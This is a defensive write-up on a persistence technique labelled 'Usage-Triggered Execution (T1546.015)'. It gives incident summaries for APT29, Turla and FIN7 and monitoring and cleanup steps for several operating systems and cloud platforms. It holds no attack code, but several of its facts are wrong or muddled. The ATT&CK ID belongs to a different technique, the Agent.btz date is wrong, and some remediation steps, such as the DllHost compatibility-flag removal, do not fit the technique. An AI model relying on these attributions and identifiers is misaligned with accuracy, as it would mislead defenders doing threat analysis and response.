Usage-Triggered Execution (T1546.015)

This technique delays malware execution until a specific program is used or a specific timeframe is reached, helping attackers avoid detection by enabling activities only under set conditions.

Historical Overview and Notable Incidents

APT29 (Cozy Bear) - 2015

• Incident: Infiltrated the Democratic National Committee (DNC) networks, triggering data exfiltration based on specific user activities.

• Method: Exploited scheduled tasks and run keys to re-enable malware payloads upon reboot.

• Timelines: Mid-2015 to 2016.

• Detection/Response: Delayed persistence and sophisticated obfuscation techniques.

Turla Group - 2014

• Incident: Leveraged usage-triggered execution during the Agent.btz infection targeting government networks.

• Method: Embedded malware into legitimate utility functions triggered by specific user actions.

• Timelines: Active in 2014 with repeated revisions.

• Goals: Espionage, identified through anomalies in normal system operations.

FIN7 (Carbanak Group) - 2017

• Incident: Used usage-triggered execution during financial heists to launch malware upon activation of Point of Sale (POS) systems.

• Method: Scripts triggered by the usage of specific applications.

• Timelines: Several campaigns from 2016 to 2018.

• Detection/Response: Late detection by banking institutions and improved POS system monitoring.

Technical Specifics

Key Characteristics:

1. Trigger Points: Specific program executions or user actions.

2. Persistence Mechanisms: Use of Windows Task Scheduler, registry run keys, or idle/inactive detections.

3. Delayed Execution: Malware remains dormant or semi-passive until a predetermined condition is met.

Publicly Available Detection and Defense Resources

• Microsoft Security Guidelines: Defensive measures for hardened configurations and monitoring.

• MITRE ATT&CK Matrix: Detailed documentation under ID T1546.015.

• VirusTotal and Hybrid Analysis: Locate samples and analyze unusual triggering behaviors.

• Community Reports: GitHub repositories and InfoSec blogs documenting observed signatures and heuristic patterns.

People & Groups of Interest

• APT29 (Cozy Bear): Allegedly associated with Russia’s Foreign Intelligence Service (SVR).

• Turla Group: Russian cyber-espionage group known for advanced malware and stealth techniques.

• FIN7 (Carbanak Group): Cybercrime group focusing on financial theft, using advanced malware strategies.

Practical Implications for Infosec Engineers

• Monitoring: Enhance visibility on task schedulers, registry changes, and unusual binary executions.

• Behavioral Analysis: Invest in behavioral threat analytics to detect anomalous patterns.

• Incident Response: Rapid incident response protocols for suspected delayed execution mechanisms.

• Training & Awareness: Regularly educate IT and security staff about the risks and signs of usage-triggered execution tactics.

Windows Environment

1. Disabling Compatibility Flags for DllHost.exe:

   1. Open Registry Editor (regedit.exe).

   2. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers.

   3. Right-click Layers, select Export to back up.

   4. Remove entries related to dllhost.exe.

   5. Close Registry Editor and restart.

2. Monitoring Event Triggers:

   1. Open Event Viewer (eventvwr.msc).

   2. Navigate to Applications and Services Logs > Microsoft > Windows > TaskScheduler > Operational.

   3. Look for event IDs 319 (Task Created) and 200 (Action Executed).

   4. Set up SIEM alerts for these IDs.

macOS Environment

1. Disabling Launch Daemons and Agents:

   1. Open Terminal.

   2. List all launch daemons: sudo launchctl list.

   3. Identify suspicious daemons.

   4. Unload daemons: sudo launchctl unload -w /Library/LaunchDaemons/com.suspicious.daemon.plist.

   5. Remove daemon file: sudo rm /Library/LaunchDaemons/com.suspicious.daemon.plist.

2. Monitoring System Logs:

   1. Open Console.

   2. Navigate to /private/var/log/ and monitor system.log and asl/*.

   3. Look for unusual execution patterns.

   4. Set up centralized logging and alerts.

Linux Environment

1. Disabling Cron Jobs and Systemd Timers:

   1. List cron jobs: crontab -l and sudo ls /etc/cron*.

   2. Remove suspicious entries: crontab -e.

   3. List systemd timers: systemctl list-timers --all.

   4. Stop and disable suspicious timers: sudo systemctl stop suspicious.timer and sudo systemctl disable suspicious.timer.

2. Log Monitoring:

   1. Check system logs: sudo tail -f /var/log/syslog or sudo tail -f /var/log/messages.

   2. Look for automatic execution patterns.

   3. Set up centralized logging and use tools like logwatch or auditd.

Amazon AWS

1. CloudWatch Event Rules:

   1. Open AWS Management Console, go to CloudWatch.

   2. Select Events and Rules.

   3. Create/edit rules for suspicious API calls.

   4. Set targets like Lambda functions or SNS for alerts.

2. Lambda Function Monitoring:

   1. Go to AWS Lambda in the Console.

   2. Review list for unknown functions.

   3. Use IAM policies to restrict execution.

   4. Set up CloudWatch Logs for Lambda executions.

Google Cloud Platform (GCP)

1. Audit Log Configuration:

   1. Go to Google Cloud Console.

   2. Navigate to IAM & Admin > Audit Logs.

   3. Enable logs for Admin Activity and Data Access.

   4. Configure Stackdriver Monitoring alerts.

2. Disabling Cloud Functions:

   1. Go to Cloud Functions in the Console.

   2. Review for suspicious functions.

   3. Disable unverified functions.

Microsoft Azure

1. Azure Activity Log Alerts:

   1. Sign in to Azure portal.

   2. Navigate to Monitor > Activity Log.

   3. Create alert rule for `Administrative` and `Create`/`Update` events.

   4. Set actions like email alerts or Logic Apps triggers.

2. Azure Security Center Recommendations:

   1. Go to Security Center in the portal.

   2. Review security recommendations.

   3. Implement recommended controls.